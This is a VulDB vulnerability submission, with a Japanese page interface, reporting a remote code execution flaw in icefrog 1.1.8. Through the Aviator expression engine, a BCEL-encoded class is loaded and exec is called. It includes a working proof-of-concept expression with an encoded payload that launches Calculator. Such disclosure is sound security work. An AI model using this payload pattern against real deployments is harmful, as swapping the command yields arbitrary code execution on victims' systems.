提出 #169999: icefrog v1.1.8 Hava an Execute Arbitrary Code vulnerability情報

タイトルicefrog v1.1.8 Hava an Execute Arbitrary Code vulnerability
説明IceFrog is a suite of core and expanded libraries that include utility classes, collections, I/O classes, and much more.a tools like Guava ,apache commons,hutool. In icefrog 1.1.8, the reference enters the aviator engine to parse the expression, and the aviator expression can directly enter the new object, but it is not allowed to call non-public static methods. You can use BCELClassloader to load BCEL code to accomplish RCE. When a user uses icefrog to parse an expression, the aviator template engine is triggered, leading to an arbitrary code execution vulnerability. the testCode is here: import com.whaleal.icefrog.extra.expression.ExpressionUtil; String exp = "'a'+(c=Class.forName(\"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$5dP$cbJ$c3$40$U$3d$d3$a6M$8d$d1$b6$d6$fa$CAW$a6$5d$98$8d$bb$88$hQ$Q$8a$V$x$ee$93x$JS$f2$uy$94$7c$96nT$5c$f8$B$7e$94x$tJ$5b$i$98s$ef$3d$9c$3b$e70_$df$l$9f$A$cep$60$a0$81$8e$81$$$b6$U$f4tl$eb$e8$L4$cfe$y$f3$L$81$ba5x$U$d0$$$93$t$Sh$8fdL$b7E$e4Q$fa$e0z$n3$g$95$e4$L$9cX$a3$a9$3bw$ed$d0$8d$D$7b$92$a72$O$9c$c1$Ku$97$s$3ee$99$p$60$5c$95$3e$cdr$99$c4$99$8e$j$9e$tI$91$fat$z$d5kk4$97$e1$a9Z3$d1$84$aec$d7$c4$k$f6M$YX$X$e8$qi$60S$e9F$b3$90l$a5dji1$f6$a6$e4$e7$C$bd$8a$92$89$7d3$5eX$Jt$97$c2$fb$o$cee$c4nF$40$f9b$e8$5b$aby$ffh$H$c7$d0$f8$83$d4$a9A$a8L$8c$z$9e$O$b9$K$ae$8d$e1$h$c4$L7$i$9e$b1$f9Kr$cf$89yEI$8f$aaU$a0$f5$8e$da$f0$V$f5$e7$7fj$j$s$a3$c6$fd$G$df$cd$ca$aa$fd$D$fe$90$a41$a1$B$A$A\",true,new com.sun.org.apache.bcel.internal.util.ClassLoader()) ) + ( c.exec(\"open /System/Applications/Calculator.app\") );"; final Object eval = ExpressionUtil.eval(exp, null);
ソース⚠️ https://github.com/NanKeXXX/selfVuln_poc/blob/main/whaleal%3Aicefrog/icefrog_1.1.8_RCE.md
ユーザー
 dreamfly (UID 37785)
送信2023年06月15日 08:58 (3 年 ago)
モデレーション2023年06月18日 09:49 (3 days later)
ステータス承諾済み
VulDBエントリ231804 [whaleal IceFrog 1.1.8 Aviator Template Engine 特権昇格]
ポイント20

Do you need the next level of professionalism?

Upgrade your account now!